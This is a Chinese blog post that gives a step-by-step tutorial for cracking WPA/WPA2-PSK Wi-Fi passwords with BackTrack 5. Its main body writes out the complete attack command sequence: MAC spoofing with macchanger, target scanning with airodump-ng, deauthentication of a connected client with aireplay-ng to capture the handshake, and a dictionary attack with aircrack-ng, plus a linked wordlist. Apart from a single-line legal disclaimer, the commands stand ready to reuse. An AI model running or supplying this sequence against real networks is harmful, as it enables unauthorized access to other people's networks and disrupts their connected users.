用 BackTrack 5 破解 WPA/WPA2-PSK 密码

说到BackTrack 大家应该第一个就想到破解wifi密码,没错,当年我一开始用BackTrack也是为了要破解密码阿……^^”

前几天有朋友问我说怎么用BT5破解WPA/WPA2-PSK的密码,要破解WPA/WPA2-PSK的密码比起wep难了许多,说真的,除了工具外最需要的还是运气跟密码文件阿…..^^”

不多说,来看看吧!!

首先下载BT5的光盘候用BT5开机,哪边下载跟怎么设定开机就不要提了。
开机后透过 startx 指令进入桌面环境,BT5的桌面还挺漂亮的!!
首先先把装置停掉,改卡号,假设我的网卡界面是 wlan0

点击(此处)折叠或打开

  1. airmon-ng stop wlan0
  2. macchanger --mac 00:11:22:33:44:55 wlan0
  3. airmon-ng start wlan0
接着扫描我们要抓的AP

点击(此处)折叠或打开

  1. airodump-ng wlan0


其中可以看到有非常多个AP,这边我们以我自己的AP为例子, 再次声明,破解他人AP的密码是违法的行为。
其中我们要记得 BSSID: 84:C9:XX:XX:XX:XX 跟 CH:6
airodump-ng  -c (填入刚刚的CH) -w (随便给一个名字) –bssid (要破解的BSSID) wlan0

点击(此处)折叠或打开

  1. airodump-ng -c 6 -w crack_pw_test –bssid 84:C9:XX:XX:XX:XX wlan0
其中画面会像这样子

我们可以看到有三个装置连到这个AP,随便选一个例如 (90:ZZ:ZZ:ZZ:ZZ:ZZ)
接着输入
aireplay-ng  -0 10  -a (BSSID) -c (client_MAC) wlan0

点击(此处)折叠或打开

  1. aireplay-ng -0 10 -a 84:C9:XX:XX:XX:XX -c 90:ZZ:ZZ:ZZ:ZZ:ZZ wlan0

应该可以看到如图所示的WAP Handshake


此时已经接近成功了,如果没有出现类似这样图示的东西的话请重新执行几次。直到完成Handshake为止。
最后就是跑字典文件了
aircrack-ng -w (字典文件) -b (BSSID) (刚刚给的名字)

点击(此处)折叠或打开

  1. aircrack-ng -w dict.txt -b 84:C9:XX:XX:XX:XX crack_pw_test.cap
至于跑不跑得出结果就看个人的造化(字典文件的大小)了!!!最后奉送一个找来的字典文件!!!
 dict.zip   
阅读(5610) | 评论(0) | 转发(0) |
0

上一篇:LINUX 添加新硬盘

下一篇:CFLAGS CPPFLAGS CXXFLAGS

相关热门文章
  • SQL注入之asp+MSSQL
  • 黑客高手讲述入侵的实践经验...
  • "没有找到COMRes.dll,应用程...
  • 如何给文件夹设置密码?...
  • 免费使用正版卡巴斯基-最新key...
  • linux dhcp peizhi roc
  • 关于Unix文件的软链接
  • 求教这个命令什么意思,我是新...
  • sed -e "/grep/d" 是什么意思...
  • 谁能够帮我解决LINUX 2.6 10...
给主人留下些什么吧!~~
评论热议

你可能感兴趣的:(网络与安全)